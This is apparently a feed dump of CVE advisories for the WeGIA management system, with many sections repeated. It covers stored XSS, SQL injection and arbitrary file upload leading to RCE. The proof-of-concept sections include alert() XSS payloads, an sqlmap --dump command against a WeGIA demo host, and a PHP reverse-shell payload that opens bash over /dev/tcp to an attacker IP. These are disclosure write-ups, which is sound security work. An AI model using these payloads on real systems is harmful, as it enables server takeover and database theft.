<p>File: <code>documentos_funcionario.php</code></p> <p>Payload:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS2'</span><span class="p">);</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p>Trigger in: <code>funcionario/profile_funcionario.php?id_funcionario=1</code></p> <p>Endpoint: <code>dados_addInfo</code></p> <p><img src="/p/cve-2024-57033/image.png" width="1274" height="716" srcset="/p/cve-2024-57033/image_hu_3a215f1787b231d4.png 480w, /p/cve-2024-57033/image_hu_c7c818d4686748be.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="177" data-flex-basis="427px" /></p> <p><img src="/p/cve-2024-57033/image-1.png" width="1271" height="724" srcset="/p/cve-2024-57033/image-1_hu_fc162ce1ae7a847c.png 480w, /p/cve-2024-57033/image-1_hu_ca0fd0df14f6affb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="175" data-flex-basis="421px" /></p> <h2 id="references">References </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/issues/816" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/816</a></p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 17 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-57034/ https://www.cvehunters.com/p/cve-2024-57034/ <h2 id="cve-2024-57034-sql-injection-in-query_geracao_autophp">CVE-2024-57034: SQL Injection in <code>query_geracao_auto.php</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57034" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57034</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the endpoint <code>/WeGIA/html/socio/sistema/controller/query_geracao_auto.php</code>, specifically in the <code>query</code> parameter. This vulnerability allows the execution of arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.</p><h2 id="cve-2024-57034-sql-injection-in-query_geracao_autophp">CVE-2024-57034: SQL Injection in <code>query_geracao_auto.php</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57034" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57034</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the endpoint <code>/WeGIA/html/socio/sistema/controller/query_geracao_auto.php</code>, specifically in the <code>query</code> parameter. This vulnerability allows the execution of arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.</p> <h2 id="poc">POC </h2><h3 id="vulnerable-request">Vulnerable Request: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">POST /WeGIA/html/socio/sistema/controller/query_geracao_auto.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: comfirewall.wegia.org:8000 </span></span><span class="line"><span class="cl">Cookie: _ga_F8DXBXLV8J=GS1.1.1733498717.8.0.1733498717.60.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=4rjacbjksvve2j7goo2ldqh98l </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded; charset=UTF-8 </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Content-Length: 61 </span></span><span class="line"><span class="cl">Origin: https://comfirewall.wegia.org:8000 </span></span><span class="line"><span class="cl">Referer: https://comfirewall.wegia.org:8000/WeGIA/html/socio/sistema/psocio_geracao.php </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Te: trailers </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">query=SELECT @@version_compile_os AS Sistema_Operacional; </span></span></code></pre></td></tr></table> </div> </div><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="n">version_compile_os</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="n">Sistema_Operacional</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2024-57034/image.png" width="1780" height="429" srcset="/p/cve-2024-57034/image_hu_34c11f32ed2b11e5.png 480w, /p/cve-2024-57034/image_hu_c46263e9b2f8aae6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="414" data-flex-basis="995px" /></p> <h2 id="references">References </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/issues/825" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/825</a></p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 17 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-57035/ https://www.cvehunters.com/p/cve-2024-57035/ <h2 id="cve-2024-57035-sql-injection-vulnerability-in-nextpage-parameter-on-controlphp-endpoint">CVE-2024-57035: SQL Injection Vulnerability in <code>nextPage</code> Parameter on <code>control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57035" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57035</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the endpoint <code>/control.php</code>, specifically in the parameter <code>nextPage</code>. This vulnerability allows the execution of arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.</p><h2 id="cve-2024-57035-sql-injection-vulnerability-in-nextpage-parameter-on-controlphp-endpoint">CVE-2024-57035: SQL Injection Vulnerability in <code>nextPage</code> Parameter on <code>control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57035" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57035</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the endpoint <code>/control.php</code>, specifically in the parameter <code>nextPage</code>. This vulnerability allows the execution of arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.</p> <h2 id="poc">POC </h2><h3 id="using-sql-map">Using SQL Map: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-console" data-lang="console"><span class="line"><span class="cl"><span class="go"> sqlmap -u "https://comfirewall.wegia.org:8000/WeGIA/controle/control.php?metodo=listarUm&nomeClasse=SaudeControle&nextPage=../html/saude/profile_paciente.php?id_fichamedica=1&id=1" --dbms=mysql --cookie="_ga_F8DXBXLV8J=GS1.1.1733782455.11.1.1733782568.60.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=tc79og6t5lr33d4tjv7ct1o9pg" --dump </span></span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2024-57035/image.png" width="1900" height="320" srcset="/p/cve-2024-57035/image_hu_1762f89f55dd8ef6.png 480w, /p/cve-2024-57035/image_hu_32bb595a5d705295.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="593" data-flex-basis="1425px" /></p> <h3 id="using-sqlmap-an-attacker-could-dump-the-entire-database-information-from-wegia">Using sqlmap an attacker could dump the entire database information from WeGIA. </h3><p><img src="/p/cve-2024-57035/image-1.png" width="647" height="342" srcset="/p/cve-2024-57035/image-1_hu_1db1dfbf5b91e353.png 480w, /p/cve-2024-57035/image-1_hu_a7099c9fea5cbc8a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="454px" /></p> <h2 id="references">References </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/issues/827" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/827</a></p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 17 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22132/ https://www.cvehunters.com/p/cve-2025-22132/ <h2 id="cve-2025-22132-cross-site-scripting-xss-in-file-upload-field">CVE-2025-22132: Cross-Site Scripting (XSS) in File Upload Field </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22132" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22132</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A Cross-Site Scripting (XSS) vulnerability was identified in the file upload functionality of the following endpoint:</p> <p><code>/WeGIA/html/socio/sistema/controller/controla_xlsx.php</code></p><h2 id="cve-2025-22132-cross-site-scripting-xss-in-file-upload-field">CVE-2025-22132: Cross-Site Scripting (XSS) in File Upload Field </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22132" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22132</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A Cross-Site Scripting (XSS) vulnerability was identified in the file upload functionality of the following endpoint:</p> <p><code>/WeGIA/html/socio/sistema/controller/controla_xlsx.php</code></p> <h2 id="poc">POC </h2><p style="text-align: justify;">After capturing the file upload request from /WeGIA/html/socio/sistema/controller/controla_xlsx.php, simply change the uploaded file type to <code>.php%00</code>, insert the payload into the content and send the request.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS Exploited!'</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22132/image.png" width="1510" height="451" srcset="/p/cve-2025-22132/image_hu_f47dac39de82e7b6.png 480w, /p/cve-2025-22132/image_hu_a89b0f13e82df629.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="334" data-flex-basis="803px" /></p> <p>Once uploaded, open the file in <code>/WeGIA/html/socio/sistema/tabelas/xss.php_00</code></p> <p><img src="/p/cve-2025-22132/image-1.png" width="1939" height="638" srcset="/p/cve-2025-22132/image-1_hu_9aa134d60ca58639.png 480w, /p/cve-2025-22132/image-1_hu_7e0c114e9758bbff.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="303" data-flex-basis="729px" /></p> <h2 id="reference">Reference </h2><p><a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22132" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22132</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 17 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22133/ https://www.cvehunters.com/p/cve-2025-22133/ <h2 id="cve-2025-22133-arbitrary-file-upload-with-remote-code-execution-rce">CVE-2025-22133: Arbitrary File Upload with Remote Code Execution (RCE) </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22133" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22133</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A critical vulnerability was identified in the following endpoint:</p> <p><code>/WeGIA/html/socio/sistema/controller/controla_xlsx.php</code></p> <p style="text-align: justify;">The endpoint accepts file uploads without proper validation, allowing the upload of malicious files, such as <code>.phar</code>, which can then be executed by the server.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The vulnerability resides in the endpoint <code>/WeGIA/html/socio/sistema/controller/controla_xlsx.php</code>, which fails to validate uploaded files properly. This allows an attacker to upload malicious files, such as <code>.phar</code>, capable of being executed on the server. By crafting a malicious file containing arbitrary code, attackers can trigger Remote Code Execution (RCE) on the vulnerable server.</p><h2 id="cve-2025-22133-arbitrary-file-upload-with-remote-code-execution-rce">CVE-2025-22133: Arbitrary File Upload with Remote Code Execution (RCE) </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22133" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22133</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A critical vulnerability was identified in the following endpoint:</p> <p><code>/WeGIA/html/socio/sistema/controller/controla_xlsx.php</code></p> <p style="text-align: justify;">The endpoint accepts file uploads without proper validation, allowing the upload of malicious files, such as <code>.phar</code>, which can then be executed by the server.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The vulnerability resides in the endpoint <code>/WeGIA/html/socio/sistema/controller/controla_xlsx.php</code>, which fails to validate uploaded files properly. This allows an attacker to upload malicious files, such as <code>.phar</code>, capable of being executed on the server. By crafting a malicious file containing arbitrary code, attackers can trigger Remote Code Execution (RCE) on the vulnerable server.</p> <p><code>/WeGIA/html/socio/sistema/controller/controla_xlsx.php</code></p> <p style="text-align: justify;">The endpoint accepts file uploads without proper validation, allowing the upload of malicious files, such as <code>.phar</code>, which can then be executed by the server. This enables remote code execution on the vulnerable server.</p> <h2 id="poc">POC </h2><p style="text-align: justify;">After capturing the file upload request from <code>/WeGIA/html/socio/sistema/controller/controla_xlsx.php</code>, simply change the uploaded file type to <code>.phar</code>, insert the payload into the content and send the request.</p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"> <span class="o"><?</span><span class="nx">php</span> </span></span><span class="line"><span class="cl"> <span class="nv">$ip</span> <span class="o">=</span> <span class="s1">'IP'</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$port</span> <span class="o">=</span> <span class="mi">4444</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nx">system</span><span class="p">(</span><span class="s2">"/bin/bash -c 'bash -i >& /dev/tcp/</span><span class="si">$ip</span><span class="s2">/</span><span class="si">$port</span><span class="s2"> 0>&1'"</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="cp">?></span><span class="err"> </span></span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22133/400773970-f6dd0844-9610-400f-9165-91f609f19115.png" width="948" height="420" srcset="/p/cve-2025-22133/400773970-f6dd0844-9610-400f-9165-91f609f19115_hu_14d08963998eb067.png 480w, /p/cve-2025-22133/400773970-f6dd0844-9610-400f-9165-91f609f19115_hu_177b0a88abf34885.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="225" data-flex-basis="541px" /></p> <p style="text-align: justify;">Once uploaded, run the shell on the file path in:</p> <p><code>/WeGIA/html/socio/sistema/tabelas/shell.phar</code></p> <p><img src="/p/cve-2025-22133/400774094-bc1f11c8-688d-422a-87c9-a1a8c746dcdb.png" width="1588" height="1228" srcset="/p/cve-2025-22133/400774094-bc1f11c8-688d-422a-87c9-a1a8c746dcdb_hu_88f6b8d27816ef4a.png 480w, /p/cve-2025-22133/400774094-bc1f11c8-688d-422a-87c9-a1a8c746dcdb_hu_ae50e27ba1354998.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="129" data-flex-basis="310px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> This vulnerability allows an attacker to: <ul> <li>Gain access to the server through a reverse shell.</li> <li>Execute arbitrary commands with the privileges of the web server user.</li> <li>Exfiltrate sensitive data, such as configuration files, logs, or confidential user information.</li> <li>Compromise the integrity and availability of the system.</li> <li>Escalate privileges if additional vulnerabilities are present.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mjgr-2jxv-v8qf" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mjgr-2jxv-v8qf</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 17 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22613/ https://www.cvehunters.com/p/cve-2025-22613/ <h2 id="cve-2025-22613-cross-site-scripting-xss-stored-endpoint-informacao_adicionalphp-parameter-descricao">CVE-2025-22613: Cross-Site Scripting (XSS) Stored endpoint <code>informacao_adicional.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22613" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22613</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>informacao_adicional.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/funcionario/informacao_adicional.php</code></p><h2 id="cve-2025-22613-cross-site-scripting-xss-stored-endpoint-informacao_adicionalphp-parameter-descricao">CVE-2025-22613: Cross-Site Scripting (XSS) Stored endpoint <code>informacao_adicional.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22613" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22613</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>informacao_adicional.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/funcionario/informacao_adicional.php</code></p> <p>Parameter: <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>informacao_adicional.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22613/402279333-98da3af8-8399-473c-8d41-a9b4dac048c6.png" width="823" height="329" srcset="/p/cve-2025-22613/402279333-98da3af8-8399-473c-8d41-a9b4dac048c6_hu_7f238cf8b0211445.png 480w, /p/cve-2025-22613/402279333-98da3af8-8399-473c-8d41-a9b4dac048c6_hu_84bd6de71a116271.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="250" data-flex-basis="600px" /></p> <p><img src="/p/cve-2025-22613/402279334-d7d04cc8-f50d-4f1b-9978-192fb9210160.png" width="805" height="151" srcset="/p/cve-2025-22613/402279334-d7d04cc8-f50d-4f1b-9978-192fb9210160_hu_338e149e8a37e9eb.png 480w, /p/cve-2025-22613/402279334-d7d04cc8-f50d-4f1b-9978-192fb9210160_hu_f10658a576682b25.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="533" data-flex-basis="1279px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their 